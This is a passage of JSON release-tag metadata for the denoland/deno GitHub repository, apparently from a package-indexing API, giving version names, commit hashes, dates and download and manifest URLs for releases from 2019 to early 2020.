0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind"